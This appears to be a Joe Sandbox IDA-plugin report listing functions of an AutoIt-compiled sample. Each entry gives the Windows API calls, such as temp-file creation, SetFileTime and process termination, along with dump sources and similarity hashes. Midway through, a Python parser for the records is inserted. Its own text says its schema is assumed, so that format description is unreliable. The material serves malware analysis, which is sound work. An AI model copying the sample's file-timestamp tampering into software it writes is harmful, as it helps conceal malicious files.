                                                                      • Instruction Fuzzy Hash: 4731C071908305AAD721EB60DC46FEBB7ECAB80714F00892EF59997191DF749A49C7C3
                                                                      APIs
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 009E0668
                                                                        • Part of subcall function 009E32A4: RaiseException.KERNEL32(?,?,?,009E068A,?,00A91444,?,?,?,?,?,?,009E068A,009C1129,00A88738,009C1129), ref: 009E3304
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 009E0685
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                      • String ID: Unknown exception
                                                                      • API String ID: 3476068407-410509341
                                                                      • Opcode ID: 39e8fbc6c7b0b0e82ec29ba59dc7864deefbb49a56a23c057a86be3386080285
                                                                      • Instruction ID: 137093a958c5f914c5338f368356304a1a709730c713746eb289a178aeaa35e2
                                                                      • Opcode Fuzzy Hash: 39e8fbc6c7b0b0e82ec29ba59dc7864deefbb49a56a23c057a86be3386080285
                                                                      • Instruction Fuzzy Hash: 83F04C3080028C77CB01B666D84AE5E777D6EC0300BA08531B924D66D1EFB0DE55C6C0
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00A3302F
                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00A33044
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$FileNamePath
                                                                      • String ID: aut
                                                                      • API String ID: 3285503233-3010740371
                                                                      • Opcode ID: b10c57a4abadc6547898064ea9ed7dc6b6ee8a0a1f671dc8489c3917b8e764e7
                                                                      • Instruction ID: 08a610a79147774b4aa50418f13c790ba52eb6e060caf3cf16cba49aa534020c
                                                                      • Opcode Fuzzy Hash: b10c57a4abadc6547898064ea9ed7dc6b6ee8a0a1f671dc8489c3917b8e764e7
                                                                      • Instruction Fuzzy Hash: E3D05E725003287BDA20F7E4AC4EFCB7A6CEB04761F0006A1B655E2095EAB09985CBD0
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00A482F5
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00A482FC
                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00A484DD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                      • String ID:
                                                                      • API String ID: 146820519-0
                                                                      • Opcode ID: 017a79964f8d1875a8a364d822addb1ec417699edcdacbf0b8b3457f51083e9a
                                                                      • Instruction ID: 5295acbcd2fed9f6315992aaf634c27abb7251caa08257dd952d55a596b21893
                                                                      • Opcode Fuzzy Hash: 017a79964f8d1875a8a364d822addb1ec417699edcdacbf0b8b3457f51083e9a
                                                                      • Instruction Fuzzy Hash: 0A127A75A083019FC724DF28D484B2EBBE1BFC9314F14895DE8998B252DB35ED45CB92
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f182c13423ff32b7868832d9272b967f4e1728f6f565c79f06d3d7f355348acd
                                                                      • Instruction ID: 1a898539722b763fb5495011c6ccb8f5e324e5218efc5a9f1e411bbe2591edbd
                                                                      • Opcode Fuzzy Hash: f182c13423ff32b7868832d9272b967f4e1728f6f565c79f06d3d7f355348acd
                                                                      • Instruction Fuzzy Hash: 5E51A071E00A0D9FCB11AFA9C845FBEBBB8AF45321F16045AF705A7291D7359A01CB61
                                                                      APIs
                                                                        • Part of subcall function 009C1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009C1BF4
                                                                        • Part of subcall function 009C1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 009C1BFC
                                                                        • Part of subcall function 009C1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009C1C07
                                                                        • Part of subcall function 009C1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009C1C12
                                                                        • Part of subcall function 009C1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 009C1C1A
                                                                        • Part of subcall function 009C1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 009C1C22
                                                                        • Part of subcall function 009C1B4A: RegisterWindowMessageW.USER32(00000004,?,009C12C4), ref: 009C1BA2
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009C136A
                                                                      • OleInitialize.OLE32 ref: 009C1388
                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00A024AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID:
                                                                      • API String ID: 1986988660-0
                                                                      • Opcode ID: 0907afe031a795595bdcfd6ff1d15881caff0c157e4a499ed9095014e16e8ab7
                                                                      • Instruction ID: 19d93293cb378d88740374891ddc31cba75a4104c8ea034c7c1ed5fe33a96816
                                                                      • Opcode Fuzzy Hash: 0907afe031a795595bdcfd6ff1d15881caff0c157e4a499ed9095014e16e8ab7
                                                                      • Instruction Fuzzy Hash: 097189B8F113028FCB85DFB9A985A593AE0BB89394756862FD41AC7362EF304447CF45
                                                                      APIs
                                                                        • Part of subcall function 009C3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 009C3A04
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A2C259
                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00A2C261
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A2C270
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_Timer$Kill
                                                                      • String ID:
                                                                      • API String ID: 3500052701-0
                                                                      • Opcode ID: 6112d1d990dd097c51598e95e4e363a38d855cb4028cabb5f837a010893dbcb3
                                                                      • Instruction ID: 0a9ea362b9d27e57b9a7b5b4b7a942af0b49a4864b2e6db1717acede21b163fe
                                                                      • Opcode Fuzzy Hash: 6112d1d990dd097c51598e95e4e363a38d855cb4028cabb5f837a010893dbcb3
                                                                      • Instruction Fuzzy Hash: 5131D570904364AFEB32DF689855BEBBBFCAF06318F0004AED1DA97241CB745A85CB51
                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,009F85CC,?,00A88CC8,0000000C), ref: 009F8704
                                                                      • GetLastError.KERNEL32(?,009F85CC,?,00A88CC8,0000000C), ref: 009F870E
                                                                      • __dosmaperr.LIBCMT ref: 009F8739
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 2583163307-0
                                                                      • Opcode ID: ba5afb7bdac6359c3b09d6ba4d76e312840b291c57dc1b30742355806877df7b
                                                                      • Instruction ID: 13335ff76112f6b14670ae1cb9be19b3c59bdfcc823687c8a235a5fae3f84ce5
                                                                      • Opcode Fuzzy Hash: ba5afb7bdac6359c3b09d6ba4d76e312840b291c57dc1b30742355806877df7b
                                                                      • Instruction Fuzzy Hash: 8E012B33605A685AD6A4A2786849B7F678D8BC2779F3A0119FB14CB1D2DEA18C818350
                                                                      APIs
                                                                      • TranslateMessage.USER32(?), ref: 009CDB7B
                                                                      • DispatchMessageW.USER32(?), ref: 009CDB89
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009CDB9F
                                                                      • Sleep.KERNEL32(0000000A), ref: 009CDBB1
                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00A11CC9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                      • String ID:
                                                                      • API String ID: 3288985973-0
                                                                      • Opcode ID: 3df22c0ecb970f7a3f05dc52401d7abdac4eef02bb4d3fc85a7b4dd86dbe206f
                                                                      • Instruction ID: 4b3671e511ba00a70c0c34fff66ab3d3b0c5cfc94404a4c6076d155ed81c37c1
                                                                      • Opcode Fuzzy Hash: 3df22c0ecb970f7a3f05dc52401d7abdac4eef02bb4d3fc85a7b4dd86dbe206f
                                                                      • Instruction Fuzzy Hash: BFF082306453419BEB30CBA0CC89FEA73ECFB88311F104929E60AC30C0EB309489DB26
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00A32CD4,?,?,?,00000004,00000001), ref: 00A32FF2
                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00A32CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A33006
                                                                      • CloseHandle.KERNEL32(00000000,?,00A32CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A3300D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleTime
                                                                      • String ID:
                                                                      • API String ID: 3397143404-0
                                                                      • Opcode ID: fc47b2472cfa35f55a59f135445d8f8c891a06cd9190215f437f8df2f8897e1b
                                                                      • Instruction ID: 5e0a17a9decb6739e4c0dc766bce1288d1a17f90d45cbeb4fe2e549ba7188c80
                                                                      • Opcode Fuzzy Hash: fc47b2472cfa35f55a59f135445d8f8c891a06cd9190215f437f8df2f8897e1b
                                                                      • Instruction Fuzzy Hash: 26E086366807147BD63017A5BC0DF8B3A1CF786B72F104210F719790D046A0150282A8
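Every function record in this part of the report has the same fixed layout: an `APIs` bullet list (direct calls plus `Part of subcall function` entries inherited from callees), the `Memory Dump Source` block, the `Joe Sandbox IDA Plugin` snapshot line and the `Similarity` fields, which always end with the `Instruction Fuzzy Hash`. The parser below is an added example and is not part of the Joe Sandbox report or its tooling; it turns two records copied from this page (the `CreateFileW`/`SetFileTime`/`CloseHandle` record above and the `Shell_NotifyIconW`/`KillTimer`/`SetTimer` record, abridged by dropping the `Associated:` dump lines and the Opcode ID / Instruction ID lines) into structured data, so call chains and hashes can be searched or pivoted on across a large report. The field names and regular expressions are assumptions about the export format as it is rendered here, not a documented Joe Sandbox schema.

```python
"""Parse Joe Sandbox IDA-plugin function records (added example, not report tooling)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Two records copied from the report, abridged: the "Associated:" dump lines and the
# Opcode ID / Instruction ID lines are dropped. Everything else is the report's own text.
SAMPLE = """\
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00A32CD4,?,?,?,00000004,00000001), ref: 00A32FF2
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00A32CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A33006
• CloseHandle.KERNEL32(00000000,?,00A32CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A3300D
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode Fuzzy Hash: fc47b2472cfa35f55a59f135445d8f8c891a06cd9190215f437f8df2f8897e1b
• Instruction Fuzzy Hash: 26E086366807147BD63017A5BC0DF8B3A1CF786B72F104210F719790D046A0150282A8
APIs
  • Part of subcall function 009C3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 009C3A04
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A2C259
• KillTimer.USER32(?,00000001,?,?), ref: 00A2C261
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A2C270
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
• Opcode Fuzzy Hash: 6112d1d990dd097c51598e95e4e363a38d855cb4028cabb5f837a010893dbcb3
• Instruction Fuzzy Hash: 5131D570904364AFEB32DF689855BEBBBFCAF06318F0004AED1DA97241CB745A85CB51
"""

# One API bullet: optional "Part of subcall function X:" prefix, Name.MODULE(args), ref: addr.
# Entries such as OleInitialize.OLE32 or __dosmaperr.LIBCMT carry no argument list at all.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)\s*$"
)
# Any other "• Key: value" bullet (Source File, API ID, hashes, ...). Assumed layout.
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]          # raw argument column, "?" where the plugin could not resolve a value
    ref: str                 # address of the call site in the dump
    subcall_of: Optional[str] = None  # set when the call belongs to a callee, not this function


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the flat bullet listing into one FunctionRecord per function."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            cur.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
            continue
        f = FIELD_RE.match(line)
        if f:
            cur.fields[f["key"]] = f["val"].strip()
            if f["key"] == "Instruction Fuzzy Hash":   # always the last line of a record
                records.append(cur)
                cur = FunctionRecord()
    if cur.apis or cur.fields:   # a truncated trailing record is kept rather than lost
        records.append(cur)
    return records


def direct_api_names(rec: FunctionRecord) -> List[str]:
    """APIs this function calls itself; subcall entries describe its callees."""
    return [c.name for c in rec.apis if c.subcall_of is None]


def records_calling(records: List[FunctionRecord], *names: str) -> List[FunctionRecord]:
    """Records whose direct call set contains every API name given (chain search)."""
    return [r for r in records if set(names) <= set(direct_api_names(r))]


def index_by_fuzzy_hash(records: List[FunctionRecord]) -> Dict[str, FunctionRecord]:
    """Instruction fuzzy hash -> record, the key used to match functions across samples."""
    return {r.fields["Instruction Fuzzy Hash"]: r for r in records if "Instruction Fuzzy Hash" in r.fields}


RECORDS = parse_records(SAMPLE)

if __name__ == "__main__":
    for r in RECORDS:
        print(r.fields.get("API String ID"), "->", direct_api_names(r))
```

Feeding a whole report's function section through `parse_records` and calling `records_calling` with a pair such as `"CreateFileW", "SetFileTime"` isolates the handful of functions that touch file timestamps; `index_by_fuzzy_hash` gives the key to compare those functions against a second sample of the same AutoIt wrapper.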
                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 009D17F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID: CALL
                                                                      • API String ID: 1385522511-4196123274
                                                                      • Opcode ID: 4ae49e01524c8b6d81bc297c0ec958e04e63fee14ab027ec0ec93b5a7dbce7db
                                                                      • Instruction ID: c1564ff5f33f168bca3b73131b74399b2e26cf0f78ec93fe25311ccf483399da
                                                                      • Opcode Fuzzy Hash: 4ae49e01524c8b6d81bc297c0ec958e04e63fee14ab027ec0ec93b5a7dbce7db
                                                                      • Instruction Fuzzy Hash: 5D229B71648301AFC714CF14C490B6ABBF6BF89314F14895EF4968B3A2D735E985CB92
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00A36F6B
                                                                        • Part of subcall function 009C4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4EFD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad_wcslen
                                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                                      • API String ID: 3312870042-2806939583
                                                                      • Opcode ID: 5d8d54725612f4e418d47370003a78ed082e48037ae19d599a49258aaf69ff18
                                                                      • Instruction ID: 46cc0b9b8d43b59aae6d6499658362d68ca965281c8a844682f566fbbe4ee943
                                                                      • Opcode Fuzzy Hash: 5d8d54725612f4e418d47370003a78ed082e48037ae19d599a49258aaf69ff18
                                                                      • Instruction Fuzzy Hash: 62B170716082019FCB14EF64C491FAEB7E5AFD4314F04896DF496972A2EB30ED49CB92
                                                                      APIs
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00A02C8C
                                                                        • Part of subcall function 009C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009C3A97,?,?,009C2E7F,?,?,?,00000000), ref: 009C3AC2
                                                                        • Part of subcall function 009C2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009C2DC4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                      • String ID: X
                                                                      • API String ID: 779396738-3081909835
                                                                      • Opcode ID: b5e32256e58901fbbfca2730ab8a60b8803fd73b625c3cdda3e0ddd7c039e5ec
                                                                      • Instruction ID: 5cf84e9fec912dccb0c2e769cf5d1a96a75b27dd680d000daca89c2ec6c5b0bf
                                                                      • Opcode Fuzzy Hash: b5e32256e58901fbbfca2730ab8a60b8803fd73b625c3cdda3e0ddd7c039e5ec
                                                                      • Instruction Fuzzy Hash: A5219671E102589FDB01EF94D845BDE7BFCAF88314F008059E405BB281DBB45A498F61
                                                                      APIs
                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 009C3908
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      • Opcode ID: eff77fbd59e18a862af87746cafd0db0f3d2ff0cfbd3932d521ea456bfd8a445
                                                                      • Instruction ID: 775183347b8a54b40707d88113cf1a84e95a447bd016aab4c72917cf44e92bfe
                                                                      • Opcode Fuzzy Hash: eff77fbd59e18a862af87746cafd0db0f3d2ff0cfbd3932d521ea456bfd8a445
                                                                      • Instruction Fuzzy Hash: CC31A270A04301DFD761DF64D885B97BBF8FB49758F00492EF59987240E7B1AA44CB52
                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 009CBB4E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID:
                                                                      • API String ID: 1385522511-0
                                                                      • Opcode ID: 65d9d11bd69c2c2ae4f27ccbb21c44ebad3fc2717612146412e7b0307d6f284a
